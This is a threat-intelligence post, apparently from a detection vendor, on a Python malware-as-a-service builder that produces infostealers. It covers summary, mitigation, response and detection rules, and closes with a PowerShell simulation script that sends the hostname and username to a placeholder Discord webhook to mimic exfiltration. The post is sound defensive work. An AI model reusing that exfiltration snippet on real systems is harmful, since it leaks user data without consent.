SOC Prime Bias: High

29 Sep 2026 14:01 UTC

The Stealer Factory: Python-Powered MaaS for Building Infostealers

Author Photo
SOC Prime Team linkedin icon Follow
The Stealer Factory: Python-Powered MaaS for Building Infostealers
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A new Malware-as-a-Service (MaaS) operation has been identified using a Python-based builder to generate customized infostealer payloads. The builder enables operators to package malware as Windows executables through Nuitka or PyInstaller while embedding webhook configurations. The resulting stealers target browser credentials, Discord tokens, Roblox cookies, and stored Wi-Fi passwords.

Investigation

Analysts examined a nested archive containing both the builder and an embedded payload. The investigation found that the builder protects webhook URLs using XOR and Base64 encoding and can automatically install required dependencies through pip.exe. The generated payload also implements anti-analysis techniques, including debugger detection and disk-size checks designed to identify sandboxed environments.

Mitigation

Organizations should monitor for unexpected execution of pip.exe and suspicious scheduled task creation. Restricting access to browser data directories and detecting unauthorized use of netsh commands can further reduce exposure. Keeping endpoint protection solutions current is also important for identifying rapidly evolving Python-based malware families.

Response

When malicious activity is detected, isolate the affected endpoint to stop further data exfiltration through attacker-controlled webhooks. Review registry Run keys and scheduled tasks for unauthorized persistence mechanisms. Analyze network telemetry for unusual HTTP POST requests directed to unknown, newly observed, or suspicious webhook endpoints.

Attack Flow

We are still updating this part.

Detections

Possible Schtasks or AT Usage for Persistence (via cmdline)

SOC Prime Team
28 Sep 2026

Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)

SOC Prime Team
28 Sep 2026

Possible IP Lookup Domain Communications Attempted (via dns)

SOC Prime Team
28 Sep 2026

IOCs (HashMd5) to detect: The Stealer Factory: Unpacking a Python-Based MaaS Infostealer Builder

SOC Prime AI Rules
28 Sep 2026

Detection of Debugger Presence and Wi-Fi Profile Enumeration Attempts [Windows Process Creation]

SOC Prime AI Rules
28 Sep 2026

Suspicious HTTP POST Requests to Webhook Endpoints [Windows Network Connection]

SOC Prime AI Rules
28 Sep 2026

Detection of Unexpected Pip Execution and PyInstaller Invocation in Python Malware Builder [Windows Process Creation]

SOC Prime AI Rules
28 Sep 2026

Simulation Execution

  • Attack Narrative & Commands: An adversary has deployed a lightweight infostealer on a Windows workstation. To avoid the overhead of managing a dedicated C2 server, the attacker uses a Discord Webhook to exfiltrate system metadata (e.g., hostname and username). The script performs an HTTP POST request to the Discord API. This action is designed to blend in with legitimate developer or gaming traffic while specifically targeting the discordapp.com/api/webhooks URI pattern, which the detection rule is programmed to flag.

  • Regression Test Script:

    # Simulation of Data Exfiltration via Discord Webhook
    $webhookUrl = "https://discordapp.com/api/webhooks/test-id/test-token"
    $payload = @{
        content = "Exfiltrated Data: Hostname=$env:COMPUTERNAME, User=$env:USERNAME"
    } | ConvertTo-Json
    
    Write-Host "[+] Simulating Webhook Exfiltration..."
    try {
        Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
        Write-Host "[+] Simulation command sent successfully."
    } catch {
        Write-Host "[-] Command sent (Expected failure if URL is fake, but telemetry should still generate): $_"
    }
  • Cleanup Commands:

    # No persistent files were created; no cleanup required for this memory-only simulation.
    Write-Host "[+] Cleanup complete: No artifacts left on system."